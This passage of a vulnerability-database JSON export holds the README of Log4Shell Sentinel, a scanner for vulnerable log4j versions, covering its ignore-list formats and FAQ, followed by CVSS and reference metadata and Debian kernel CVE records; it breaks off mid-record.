CSV file in the following format:\n\n~~~\nMD5Sum,AppName,Reason\n~~~\n\nThe *AppName* and *Reason* columns may be empty but are there for you to keep track of why you are including or excluding specific applications.\n\n**NOTE** As this feature uses the MD5 hash calculated for the application, this will only work for applications that are fat / uber jars, EARs or WARs.\n\nFor example, if we had the following finding:\n\n~~~\nIP,Hostname,AppName,Team,Ignore (Y/N),Comments,MD5Hash,Timestamp,Container,ContainerImage,FullPath,Version\n192.168.121.121,server3,,,,,4e615cd580758b70c49ade1f79103328,2021-12-21T07:38:09Z,true,ghcr.io/christophetd/log4shell-vulnerable-app:latest,/run/containerd/io.containerd.runtime.v2.task/k8s.io/dc2c9c214809f506283c917244cd126a9b056ac7274322d12b59c9196d95dd9b/rootfs/app/spring-boot-application.jar,log4j-core-2.14.1.jar\n~~~\n\nand determined that the application _isn&#x27;t vulnerable_, we can simply save the following in `hashes.csv`:\n\n~~~csv\n4e615cd580758b70c49ade1f79103328,Demo App,Not vulnerable\n~~~\n\nand then re-run it:\n\n~~~\n# ./log4shell_sentinel --im hashes.csv --path /\n~~~\n\nthe above finding would be suppressed.\n\n#### Container Mappings -&gt; Images Ignore List\n\nThe list is a simple CSV file in the following format:\n\n~~~\nContainer Image,AppName,Reason\n~~~\n\nBuilding on the previous example, we can tell it to ignore any finding where the container image is: `ghcr.io/christophetd/log4shell-vulnerable-app:latest` by creating a `images.csv` file such as this:\n\n~~~\nghcr.io/christophetd/log4shell-vulnerable-app:latest,,\n~~~\n\nand then running it by:\n\n~~~\n# ./log4shell_sentinel --ic images.csv -p /\n~~~\n\nAgain, our previous finding would be suppressed.\n\n#### Path Ignore List\n\nAgain, this is a simple CSV file in the following format:\n\n~~~\nPath,AppName,Reason\n~~~\n\nUsing the example above, if we create the following `paths.csv` file:\n\n~~~csv\n/run/containerd/io.containerd.runtime.v2.task/k8s.io/dc2c9c214809f506283c917244cd126a9b056ac7274322d12b59c9196d95dd9b/rootfs/app/spring-boot-application.jar,Demo App,Not vulnerable\n~~~\n\nthe previous finding would be suppressed.\n\n**WARNING** When possibly, it is better to use an MD5 hash or container image name for suppression as the path may be not be unique\n\n## Mass Scanning Your Environment\n\nWhile it is perfectly fine to run Log4Shell Sentinel on a single server, it really shines when combined with your favorite configuration management tool (Ansible, Chef, Puppet, Salt, AWS SSM, etc.) or even simple parallel SSH tools such as [parellel-ssh](https://github.com/ParallelSSH/parallel-ssh). \n\nThis gives you numerous benefits including:\n\n* finding duplicate instances of your applications and containers and treating these findings as a single finding at the analysis phase\n* scanning your entire environment in minutes\n\nFor a full example of this in action, refer to the my blog [post](https://osamaelnaggar.com/blog/introducing_log4shell_sentinel/)\n\n## Workflow\n\nRefer to the **Mass Scanning Your Environment** section.\n\n## FAQ\n\n* I&#x27;m not seeing all vulnerable applications. Why?\n  - The primary reason is probably related to either not running it as the `root` user (it requires access to where your applications might be installed) or you having specified the correct `path`. It is recommended that you run it as the `root` user and set `--path /`\n* What **limitations** does it have? Some limitations include:\n  - The tool can&#x27;t definitively state if a given application is vulnerable or not. Instead, it will detect if an application contains a version of the library which is vulnerable\n  - If the application detected is not running in a container, the tool can&#x27;t detect if a given application is running or not. So even a command line tool that uses the vulnerable version will be detected\n  - The tool requires SSH access and will therefore not detect issues on systems where it can&#x27;t run\n* The container -&gt; image mapping isn&#x27;t working. Why?\n  - As of v1.0.0, the tool currently supports mapping for the following:\n    * Docker (with Overlay2 storage driver)\n    * Docker (with aufs storage driver)\n    * CRI-O\n    * containerd\n\n    If you are using anything else, then the mapping will not work. If you are using one of the above, it may be that you are not running the tool as the `root` user or that the socket / files used are located in a non-default location.\n* What vulnerabilities does it detect? \n  - While primarily aimed at detections versions of log4j that may be susceptible to CVE-2021-45105, it also flags versions that are vulnerable to CVE-2021-45046 and CVE-2021-44228.\n* Does the tool work on Windows?\n  - Although I haven&#x27;t tested this, it should work. However, features such as container file -&gt; image mapping are Linux-specific.\n* Are there any external dependencies?\n  - No. The binary is statically compiled.\n\n## Author\n\nDeveloped by: **Osama Elnaggar**\n\n* Website: [https://osamaelnaggar.com](https://osamaelnaggar.com)\n* Twitter: [https://twitter.com/securityfu](https://twitter.com/securityfu)\n* LinkedIn: [ https://www.linkedin.com/in/osama-elnaggar-08230957 ]( https://www.linkedin.com/in/osama-elnaggar-08230957 )\n&quot;, &quot;published&quot;: &quot;2021-12-22T08:35:04&quot;, &quot;modified&quot;: &quot;2021-12-22T09:19:03&quot;, &quot;cvss&quot;: {&quot;score&quot;: 9.3, &quot;vector&quot;: &quot;AV:N/AC:M/Au:N/C:C/I:C/A:C&quot;}, &quot;cvss2&quot;: {&quot;cvssV2&quot;: {&quot;version&quot;: &quot;2.0&quot;, &quot;vectorString&quot;: &quot;AV:N/AC:M/Au:N/C:C/I:C/A:C&quot;, &quot;accessVector&quot;: &quot;NETWORK&quot;, &quot;accessComplexity&quot;: &quot;MEDIUM&quot;, &quot;authentication&quot;: &quot;NONE&quot;, &quot;confidentialityImpact&quot;: &quot;COMPLETE&quot;, &quot;integrityImpact&quot;: &quot;COMPLETE&quot;, &quot;availabilityImpact&quot;: &quot;COMPLETE&quot;, &quot;baseScore&quot;: 9.3}, &quot;severity&quot;: &quot;HIGH&quot;, &quot;exploitabilityScore&quot;: 8.6, &quot;impactScore&quot;: 10.0, &quot;acInsufInfo&quot;: false, &quot;obtainAllPrivilege&quot;: false, &quot;obtainUserPrivilege&quot;: false, &quot;obtainOtherPrivilege&quot;: false, &quot;userInteractionRequired&quot;: false}, &quot;cvss3&quot;: {&quot;cvssV3&quot;: {&quot;version&quot;: &quot;3.1&quot;, &quot;vectorString&quot;: &quot;CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H&quot;, &quot;attackVector&quot;: &quot;NETWORK&quot;, &quot;attackComplexity&quot;: &quot;LOW&quot;, &quot;privilegesRequired&quot;: &quot;NONE&quot;, &quot;userInteraction&quot;: &quot;NONE&quot;, &quot;scope&quot;: &quot;CHANGED&quot;, &quot;confidentialityImpact&quot;: &quot;HIGH&quot;, &quot;integrityImpact&quot;: &quot;HIGH&quot;, &quot;availabilityImpact&quot;: &quot;HIGH&quot;, &quot;baseScore&quot;: 10.0, &quot;baseSeverity&quot;: &quot;CRITICAL&quot;}, &quot;exploitabilityScore&quot;: 3.9, &quot;impactScore&quot;: 6.0}, &quot;href&quot;: &quot;https://github.com/ossie-git/log4shell_sentinel&quot;, &quot;reporter&quot;: &quot;ossie-git&quot;, &quot;references&quot;: [], &quot;cvelist&quot;: [&quot;CVE-2021-44228&quot;, &quot;CVE-2021-45105&quot;, &quot;CVE-2021-45046&quot;], &quot;immutableFields&quot;: [], &quot;lastseen&quot;: &quot;2021-12-22T11:08:26&quot;, &quot;history&quot;: [], &quot;viewCount&quot;: 28, &quot;enchantments&quot;: {}, &quot;objectVersion&quot;: &quot;1.6&quot;}, &quot;lastseen&quot;: &quot;2021-12-22T11:08:26&quot;, &quot;differentElements&quot;: [&quot;modified&quot;], &quot;edition&quot;: 1}], &quot;viewCount&quot;: 64, &quot;enchantments&quot;: {&quot;dependencies&quot;: {&quot;references&quot;: [{&quot;type&quot;: &quot;citrix&quot;, &quot;idList&quot;: [&quot;CTX335705&quot;]}, {&quot;type&quot;: &quot;paloalto&quot;, &quot;idList&quot;: [&quot;PA-CVE-2021-44228&quot;]}, {&quot;type&quot;: &quot;redhatcve&quot;, &quot;idList&quot;: [&quot;RH:CVE-2021-45046&quot;, &quot;RH:CVE-2021-45105&quot;, &quot;RH:CVE-2021-44228&quot;]}, {&quot;type&quot;: &quot;checkpoint_advisories&quot;, &quot;idList&quot;: [&quot;CPAI-2021-0955&quot;, &quot;CPAI-2021-0936&quot;]}, {&quot;type&quot;: &quot;f5&quot;, &quot;idList&quot;: [&quot;F5:K24554520&quot;, &quot;F5:K32171392&quot;, &quot;F5:K34162192&quot;, &quot;F5:K19026212&quot;]}, {&quot;type&quot;: &quot;attackerkb&quot;, &quot;idList&quot;: [&quot;AKB:398CAD69-31E4-4276-B510-D93B2C648A74&quot;, &quot;AKB:0B6C144F-2E5A-4D5E-B629-E45C2530CB94&quot;]}, {&quot;type&quot;: &quot;debiancve&quot;, &quot;idList&quot;: [&quot;DEBIANCVE:CVE-2021-45105&quot;, &quot;DEBIANCVE:CVE-2021-45046&quot;, &quot;DEBIANCVE:CVE-2021-44228&quot;]}, {&quot;type&quot;: &quot;ubuntucve&quot;, &quot;idList&quot;: [&quot;UB:CVE-2021-45046&quot;, &quot;UB:CVE-2021-44228&quot;, &quot;UB:CVE-2021-45105&quot;]}, {&quot;type&quot;: &quot;cve&quot;, &quot;idList&quot;: [&quot;CVE-2021-44228&quot;, &quot;CVE-2021-45046&quot;, &quot;CVE-2021-45105&quot;]}, {&quot;type&quot;: &quot;vmware&quot;, &quot;idList&quot;: [&quot;VMSA-2021-0028.7&quot;, &quot;VMSA-2021-0028.1&quot;, &quot;VMSA-2021-0028.4&quot;, &quot;VMSA-2021-0028.3&quot;, &quot;VMSA-2021-0028.6&quot;, &quot;VMSA-2021-0028.2&quot;]}, {&quot;type&quot;: &quot;githubexploit&quot;, &quot;idList&quot;: [&quot;2AF7350D-AB79-5AB5-8AF9-0F351CE13D30&quot;, &quot;2AF28508-1272-5281-BDB7-B44D3EFC7C72&quot;, &quot;C772DCBB-20D0-51DD-A580-F96689E65773&quot;, &quot;AFC5A984-3296-5D6A-AE73-0771AF4EDAF6&quot;, &quot;7B9BDDBA-81E8-5739-B3F7-419C0D6E2316&quot;, &quot;8F362564-1631-5AF9-BB38-D1BFC4678DAE&quot;, &quot;D298A3C8-E215-5549-B1A0-D01215070203&quot;, &quot;CB9B5FAA-47CA-5D85-91B9-0AC5179D527B&quot;, &quot;C3DA2A71-DD68-5EF3-AC4C-5A10DECD333B&quot;, &quot;342CC1B7-6E24-5767-A7B1-90B95A91B503&quot;, &quot;54E7D93D-9216-5EDE-A4AD-8324A367E67B&quot;, &quot;CC4175EB-3B91-5ABB-A700-84FC1105AAD5&quot;, &quot;780AD920-FF08-55C6-84C8-A8536C6F5527&quot;, &quot;CBCB527D-3C29-5E5B-8C71-D7F20AB001D0&quot;, &quot;C76F7089-967B-5A7F-B8DA-629452876A2A&quot;, &quot;6A4495E8-D723-5923-BB6A-B9EA838CF69B&quot;, &quot;7BCC0C24-A1F7-531E-B1BA-342D21C9AF02&quot;, &quot;C68080B0-3163-5E76-AD65-2B454DBB95EE&quot;, &quot;5CEF4882-D1D5-5861-944F-34E8868BF986&quot;, &quot;29A41C2D-FF26-591A-A88B-DDB396742BBC&quot;, &quot;CA625124-9F92-5FCF-83A7-3ECF5F0EBBFB&quot;]}, {&quot;type&quot;: &quot;qualysblog&quot;, &quot;idList&quot;: [&quot;QUALYSBLOG:3FADA4B80DBBF178154C0729CFC1358F&quot;, &quot;QUALYSBLOG:42335884011D582222F08AEF81D70B94&quot;, &quot;QUALYSBLOG:5059D1C3913FB6542F3283A66F9B3A43&quot;]}, {&quot;type&quot;: &quot;kitploit&quot;, &quot;idList&quot;: [&quot;KITPLOIT:6759391622067035795&quot;]}, {&quot;type&quot;: &quot;securelist&quot;, &quot;idList&quot;: [&quot;SECURELIST:7A375F44156FACA25A0B3990F2CD73C1&quot;, &quot;SECURELIST:9CC623A02615C07A9CEABD0C58DE7931&quot;]}, {&quot;type&quot;: &quot;github&quot;, &quot;idList&quot;: [&quot;GITHUB:070AFCDE1A9C584654244E41373D86D8&quot;]}, {&quot;type&quot;: &quot;thn&quot;, &quot;idList&quot;: [&quot;THN:602D65D576B090BAC4B0C96998F8F922&quot;, &quot;THN:76D7572EDBE770410D6F0518DAD8B0AD&quot;, &quot;THN:686DDFA07B415C41BA7AB9B8970557EF&quot;]}, {&quot;type&quot;: &quot;typo3&quot;, &quot;idList&quot;: [&quot;TYPO3-PSA-2021-004&quot;]}, {&quot;type&quot;: &quot;rst&quot;, &quot;idList&quot;: [&quot;RST:D86EFFA9-3107-38D5-A9C0-D3CBF091E39D&quot;, &quot;RST:4B2296DE-AF2D-3763-8B79-92DE43775C59&quot;, &quot;RST:88DC31E6-A134-3949-9AF5-51E25878A894&quot;, &quot;RST:06FFD918-46C2-3F1B-A100-A53CD8C0E7CD&quot;, &quot;RST:C857CD75-26C6-3F83-8C9E-226118527715&quot;, &quot;RST:9A0665BB-4202-38BD-A548-1C0EEC9498C9&quot;]}, {&quot;type&quot;: &quot;ibm&quot;, &quot;idList&quot;: [&quot;78F199BD0B7C851B9B51668C7C03C7066EA862D4D07B5141F8116EE923472533&quot;, &quot;ED78D94545EF8A4A811D2C198EC427B8C46CA1FE3BBC9D6A2DC20DD440CB6FDC&quot;, &quot;6FCF3A6897C9A1A085633762339E7EC8DFE631B6D2A160FA5D1ADBC3E11F92E1&quot;, &quot;4271B86469CFCE465E783BEC3C9F3EDD13D645F55A5BEB697F3A4FCF694E568B&quot;, &quot;519FF26BE329CC59BFF47E2AAC0D4B73FCA35BCF836D736A007D121863323E8C&quot;, &quot;8968C94B71BE086C952CFA8BF1B1924C1CF6FFECA8B8864B828E68AABA1D96E8&quot;, &quot;11FEAADF6A94DFB6615A82EE0023D346C418ECD114C445A6BA52D50AA2C6FE0B&quot;, &quot;B682A1DCF5A33AB9CBD3062B0DF0A131D5180AA2BBD201782B95DC8A2C33D1AA&quot;, &quot;8FA41F50A028003D6689B034A6CA3E840361D121B9F4B4350B17EAB4605438C4&quot;, &quot;D928C805B6C7AD1BA5D5DA1EB77352559E54787E379CD22474A13592C0B83C20&quot;, &quot;18A5E6C2581806177DE446AE26FCBC2EBB616C29B40041253F318FF51CE1AFB5&quot;, &quot;BE7DD314CD7039219534B2612D0FEFD382DCC5D154AD49257A517A91FA728423&quot;, &quot;EFC94A6E1DA52C8EA7A5811D6A4381770FA24130DB4CFD911120046DD916261B&quot;]}, {&quot;type&quot;: &quot;akamaiblog&quot;, &quot;idList&quot;: [&quot;AKAMAIBLOG:94B715279ABA113C427A5E987C080DA7&quot;]}, {&quot;type&quot;: &quot;rapid7blog&quot;, &quot;idList&quot;: [&quot;RAPID7BLOG:9CB105938BDE92F573A2DE68BC20CF46&quot;, &quot;RAPID7BLOG:18D49792276E208F17E7D64BCE2FDEF6&quot;, &quot;RAPID7BLOG:F37BD0C67170721734A26D15E6D99B3E&quot;]}, {&quot;type&quot;: &quot;threatpost&quot;, &quot;idList&quot;: [&quot;THREATPOST:10D0F1DDDD6C211DA3CE6395900B7C54&quot;]}, {&quot;type&quot;: &quot;cisco&quot;, &quot;idList&quot;: [&quot;CISCO-SA-APACHE-LOG4J-QRUKNEBD&quot;]}, {&quot;type&quot;: &quot;cisa&quot;, &quot;idList&quot;: [&quot;CISA:8367DA0C1A6F51FB2D817745BB204C48&quot;, &quot;CISA:918B5EC3622C761B0424597D3F7AFF7C&quot;]}, {&quot;type&quot;: &quot;wallarmlab&quot;, &quot;idList&quot;: [&quot;WALLARMLAB:060FBB90648BCDE11554492408AE89C8&quot;, &quot;WALLARMLAB:E86F01AF50087BEB03AAB46947CDE884&quot;, &quot;WALLARMLAB:2AAA5E62EED6807B93FB40361B4927CB&quot;]}, {&quot;type&quot;: &quot;nessus&quot;, &quot;idList&quot;: [&quot;VMWARE_VCENTER_LOG4SHELL.NBIN&quot;, &quot;APACHE_LOG4SHELL_CVE-2021-45056_DIRECT_CHECK.NBIN&quot;]}, {&quot;type&quot;: &quot;impervablog&quot;, &quot;idList&quot;: [&quot;IMPERVABLOG:BE9CCB7ADF74E2AEFC999FEE704CDE71&quot;, &quot;IMPERVABLOG:357497C932E21C66FB08D2C9B8EE9CA2&quot;, &quot;IMPERVABLOG:BEE8EB9D446D0AF62464EE59DFA0CE0E&quot;]}, {&quot;type&quot;: &quot;msrc&quot;, &quot;idList&quot;: [&quot;MSRC:543F3A129A47F4B14FB170389908717B&quot;]}, {&quot;type&quot;: &quot;cloudfoundry&quot;, &quot;idList&quot;: [&quot;CFOUNDRY:690C01663F820378948F8CF2E2405F72&quot;]}, {&quot;type&quot;: &quot;qt&quot;, &quot;idList&quot;: [&quot;QT:7EFAEDCED59EA2EE3AB98A0A484C5825&quot;]}, {&quot;type&quot;: &quot;checkpoint_security&quot;, &quot;idList&quot;: [&quot;CPS:SK176865&quot;]}], &quot;modified&quot;: &quot;2021-12-22T23:07:49&quot;, &quot;rev&quot;: 2}, &quot;score&quot;: {&quot;value&quot;: 4.6, &quot;vector&quot;: &quot;NONE&quot;, &quot;modified&quot;: &quot;2021-12-22T23:07:49&quot;, &quot;rev&quot;: 2}}, &quot;objectVersion&quot;: &quot;1.6&quot;, &quot;_object_type&quot;: &quot;robots.models.githubexploit.GithubExploitBulletin&quot;, &quot;_object_types&quot;: [&quot;robots.models.base.Bulletin&quot;, &quot;robots.models.githubexploit.GithubExploitBulletin&quot;], &quot;privateArea&quot;: 1}], &quot;debiancve&quot;: [{&quot;id&quot;: &quot;DEBIANCVE:CVE-2021-45469&quot;, &quot;vendorId&quot;: null, &quot;hash&quot;: &quot;3ad3dc7adb80889b95cd4a34e4f6dbda&quot;, &quot;type&quot;: &quot;debiancve&quot;, &quot;bulletinFamily&quot;: &quot;info&quot;, &quot;title&quot;: &quot;CVE-2021-45469&quot;, &quot;description&quot;: &quot;In __f2fs_setxattr in fs/f2fs/xattr.c in the Linux kernel through 5.15 ...&quot;, &quot;published&quot;: &quot;2021-12-23T19:15:00&quot;, &quot;modified&quot;: &quot;2021-12-23T19:15:00&quot;, &quot;cvss&quot;: {&quot;score&quot;: 0.0, &quot;vector&quot;: &quot;NONE&quot;}, &quot;cvss2&quot;: {}, &quot;cvss3&quot;: {}, &quot;href&quot;: &quot;https://security-tracker.debian.org/tracker/CVE-2021-45469&quot;, &quot;reporter&quot;: &quot;Debian Security Bug Tracker&quot;, &quot;references&quot;: [], &quot;cvelist&quot;: [&quot;CVE-2021-45469&quot;], &quot;immutableFields&quot;: [], &quot;lastseen&quot;: &quot;2021-12-23T21:50:44&quot;, &quot;history&quot;: [], &quot;viewCount&quot;: 2, &quot;enchantments&quot;: {}, &quot;objectVersion&quot;: &quot;1.6&quot;, &quot;affectedPackage&quot;: [{&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;12&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;linux_5.15.5-1_all.deb&quot;, &quot;packageVersion&quot;: &quot;5.15.5-1&quot;, &quot;operator&quot;: &quot;le&quot;, &quot;status&quot;: &quot;open&quot;, &quot;packageName&quot;: &quot;linux&quot;}, {&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;11&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;linux_5.10.84-1_all.deb&quot;, &quot;packageVersion&quot;: &quot;5.10.84-1&quot;, &quot;operator&quot;: &quot;le&quot;, &quot;status&quot;: &quot;open&quot;, &quot;packageName&quot;: &quot;linux&quot;}, {&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;10&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;linux_4.19.208-1_all.deb&quot;, &quot;packageVersion&quot;: &quot;4.19.208-1&quot;, &quot;operator&quot;: &quot;le&quot;, &quot;status&quot;: &quot;open&quot;, &quot;packageName&quot;: &quot;linux&quot;}, {&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;999&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;linux_5.15.5-2_all.deb&quot;, &quot;packageVersion&quot;: &quot;5.15.5-2&quot;, &quot;operator&quot;: &quot;le&quot;, &quot;status&quot;: &quot;open&quot;, &quot;packageName&quot;: &quot;linux&quot;}, {&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;9&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;linux_4.9.228-1_all.deb&quot;, &quot;packageVersion&quot;: &quot;4.9.228-1&quot;, &quot;operator&quot;: &quot;le&quot;, &quot;status&quot;: &quot;open&quot;, &quot;packageName&quot;: &quot;linux&quot;}], &quot;_object_type&quot;: &quot;robots.models.debiancve.DebianCveBulletin&quot;, &quot;_object_types&quot;: [&quot;robots.models.base.Bulletin&quot;, &quot;robots.models.debiancve.DebianCveBulletin&quot;]}, {&quot;id&quot;: &quot;DEBIANCVE:CVE-2021-3892&quot;, &quot;vendorId&quot;: null, &quot;hash&quot;: &quot;5f30603d5cec894df15b7db180b879cc&quot;, &quot;type&quot;: &quot;debiancve&quot;, &quot;bulletinFamily&quot;: &quot;info&quot;, &quot;title&quot;: &quot;CVE-2021-3892&quot;, &quot;description&quot;: &quot;memory leak in fib6_rule_suppress could result in DoS&quot;, &quot;published&quot;: &quot;2021-12-23T16:15:00&quot;, &quot;modified&quot;: &quot;2021-12-23T16:15:00&quot;, &quot;cvss&quot;: {&quot;score&quot;: 0.0, &quot;vector&quot;: &quot;NONE&quot;}, &quot;cvss2&quot;: {}, &quot;cvss3&quot;: {}, &quot;href&quot;: &quot;https://security-tracker.debian.org/tracker/CVE-2021-3892&quot;, &quot;reporter&quot;: &quot;Debian Security Bug Tracker&quot;, &quot;references&quot;: [], &quot;cvelist&quot;: [&quot;CVE-2021-3892&quot;], &quot;immutableFields&quot;: [], &quot;lastseen&quot;: &quot;2021-12-23T17:53:57&quot;, &quot;history&quot;: [{&quot;bulletin&quot;: {&quot;id&quot;: &quot;DEBIANCVE:CVE-2021-3892&quot;, &quot;vendorId&quot;: null, &quot;hash&quot;: &quot;b6b8ef3444ecc70faac962b878ac2ba8&quot;, &quot;type&quot;: &quot;debiancve&quot;, &quot;bulletinFamily&quot;: &quot;info&quot;, &quot;title&quot;: &quot;CVE-2021-3892&quot;, &quot;description&quot;: &quot;memory leak in fib6_rule_suppress could result in DoS&quot;, &quot;published&quot;: &quot;2021-10-18T00:00:00&quot;, &quot;modified&quot;: &quot;2021-10-18T00:00:00&quot;, &quot;cvss&quot;: {&quot;score&quot;: 0.0, &quot;vector&quot;: &quot;NONE&quot;}, &quot;cvss2&quot;: {}, &quot;cvss3&quot;: {}, &quot;href&quot;: &quot;https://security-tracker.debian.org/tracker/CVE-2021-3892&quot;, &quot;reporter&quot;: &quot;Debian Security Bug Tracker&quot;, &quot;references&quot;: [], &quot;cvelist&quot;: [&quot;CVE-2021-3892&quot;], &quot;immutableFields&quot;: [], &quot;lastseen&quot;: &quot;2021-11-29T14:00:37&quot;, &quot;history&quot;: [], &quot;viewCount&quot;: 0, &quot;enchantments&quot;: {&quot;dependencies&quot;: {&quot;references&quot;: [{&quot;type&quot;: &quot;redhatcve&quot;, &quot;idList&quot;: [&quot;RH:CVE-2021-3892&quot;]}, {&quot;type&quot;: &quot;ubuntucve&quot;, &quot;idList&quot;: [&quot;UB:CVE-2021-3892&quot;]}], &quot;modified&quot;: &quot;2021-11-29T14:00:37&quot;, &quot;rev&quot;: 2}, &quot;score&quot;: {&quot;value&quot;: 1.7, &quot;vector&quot;: &quot;NONE&quot;, &quot;modified&quot;: &quot;2021-11-29T14:00:37&quot;, &quot;rev&quot;: 2}}, &quot;objectVersion&quot;: &quot;1.6&quot;, &quot;affectedPackage&quot;: [{&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;12&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;linux_5.15.3-1_all.deb&quot;, &quot;packageVersion&quot;: &quot;5.15.3-1&quot;, &quot;operator&quot;: &quot;le&quot;, &quot;status&quot;: &quot;open&quot;, &quot;packageName&quot;: &quot;linux&quot;}, {&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;11&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;linux_5.10.70-1_all.deb&quot;, &quot;packageVersion&quot;: &quot;5.10.70-1&quot;, &quot;operator&quot;: &quot;le&quot;, &quot;status&quot;: &quot;open&quot;, &quot;packageName&quot;: &quot;linux&quot;}, {&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;10&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;linux_4.19.208-1_all.deb&quot;, &quot;packageVersion&quot;: &quot;4.19.208-1&quot;, &quot;operator&quot;: &quot;le&quot;, &quot;status&quot;: &quot;open&quot;, &quot;packageName&quot;: &quot;linux&quot;}, {&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;999&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;linux_5.15.5-1_all.deb&quot;, &quot;packageVersion&quot;: &quot;5.15.5-1&quot;, &quot;operator&quot;: &quot;le&quot;, &quot;status&quot;: &quot;open&quot;, &quot;packageName&quot;: &quot;linux&quot;}, {&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;9&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;linux_4.9.228-1_all.deb&quot;, &quot;packageVersion&quot;: &quot;4.9.228-1&quot;, &quot;operator&quot;: &quot;le&quot;, &quot;status&quot;: &quot;open&quot;, &quot;packageName&quot;: &quot;linux&quot;}]}, &quot;lastseen&quot;: &quot;2021-11-29T14:00:37&quot;, &quot;differentElements&quot;: [&quot;affectedPackage&quot;], &quot;edition&quot;: 1}, {&quot;bulletin&quot;: {&quot;id&quot;: &quot;DEBIANCVE:CVE-2021-3892&quot;, &quot;vendorId&quot;: null, &quot;hash&quot;: &quot;a8b06c83271eb73ea6db5d5fa9da2745&quot;, &quot;type&quot;: &quot;debiancve&quot;, &quot;bulletinFamily&quot;: &quot;info&quot;, &quot;title&quot;: &quot;CVE-2021-3892&quot;, &quot;description&quot;: &quot;memory leak in fib6_rule_suppress could result in DoS&quot;, &quot;published&quot;: &quot;2021-10-18T00:00:00&quot;, &quot;modified&quot;: &quot;2021-10-18T00:00:00&quot;, &quot;cvss&quot;: {&quot;score&quot;: 0.0, &quot;vector&quot;: &quot;NONE&quot;}, &quot;cvss2&quot;: {}, &quot;cvss3&quot;: {}, &quot;href&quot;: &quot;https://security-tracker.debian.org/tracker/CVE-2021-3892&quot;, &quot;reporter&quot;: &quot;Debian Security Bug Tracker&quot;, &quot;references&quot;: [], &quot;cvelist&quot;: [&quot;CVE-2021-3892&quot;], &quot;immutableFields&quot;: [], &quot;lastseen&quot;: &quot;2021-12-03T06:47:56&quot;, &quot;history&quot;: [], &quot;viewCount&quot;: 0, &quot;enchantments&quot;: {&quot;dependencies&quot;: {&quot;references&quot;: [{&quot;type&quot;: &quot;redhatcve&quot;, &quot;idList&quot;: [&quot;RH:CVE-2021-3892&quot;]}, {&quot;type&quot;: &quot;ubuntucve&quot;, &quot;idList&quot;: [&quot;UB:CVE-2021-3892&quot;]}], &quot;modified&quot;: &quot;2021-12-03T06:47:56&quot;, &quot;rev&quot;: 2}, &quot;score&quot;: {&quot;value&quot;: 1.7, &quot;vector&quot;: &quot;NONE&quot;, &quot;modified&quot;: &quot;2021-12-03T06:47:56&quot;, &quot;rev&quot;: 2}}, &quot;objectVersion&quot;: &quot;1.6&quot;, &quot;affectedPackage&quot;: [{&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;12&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;linux_5.15.5-1_all.deb&quot;, &quot;packageVersion&quot;: &quot;5.15.5-1&quot;, &quot;operator&quot;: &quot;le&quot;, &quot;status&quot;: &quot;open&quot;, &quot;packageName&quot;: &quot;linux&quot;}, {&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;11&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;linux_5.10.70-1_all.deb&quot;, &quot;packageVersion&quot;: &quot;5.10.70-1&quot;, &quot;operator&quot;: &quot;le&quot;, &quot;status&quot;: &quot;open&quot;, &quot;packageName&quot;: &quot;linux&quot;}, {&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;10&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;linux_4.19.208-1_all.deb&quot;, &quot;packageVersion&quot;: &quot;4.19.208-1&quot;, &quot;operator&quot;: &quot;le&quot;, &quot;status&quot;: &quot;open&quot;, &quot;packageName&quot;: &quot;linux&quot;}, {&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;999&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;linux_5.15.5-1_all.deb&quot;, &quot;packageVersion&quot;: &quot;5.15.5-1&quot;, &quot;operator&quot;: &quot;le&quot;, &quot;status&quot;: &quot;open&quot;, &quot;packageName&quot;: &quot;linux&quot;}, {&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;9&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;linux_4.9.228-1_all.deb&quot;, &quot;packageVersion&quot;: &quot;4.9.228-1&quot;, &quot;operator&quot;: &quot;le&quot;, &quot;status&quot;: &quot;open&quot;, &quot;packageName&quot;: &quot;linux&quot;}]}, &quot;lastseen&quot;: &quot;2021-12-03T06:47:56&quot;, &quot;differentElements&quot;: [&quot;affectedPackage&quot;], &quot;edition&quot;: 2}, {&quot;bulletin&quot;: {&quot;id&quot;: &quot;DEBIANCVE:CVE-2021-3892&quot;, &quot;vendorId&quot;: null, &quot;hash&quot;: &quot;16e36073e93500e2816699d002941068&quot;, &quot;type&quot;: &quot;debiancve&quot;, &quot;bulletinFamily&quot;: &quot;info&quot;, &quot;title&quot;: 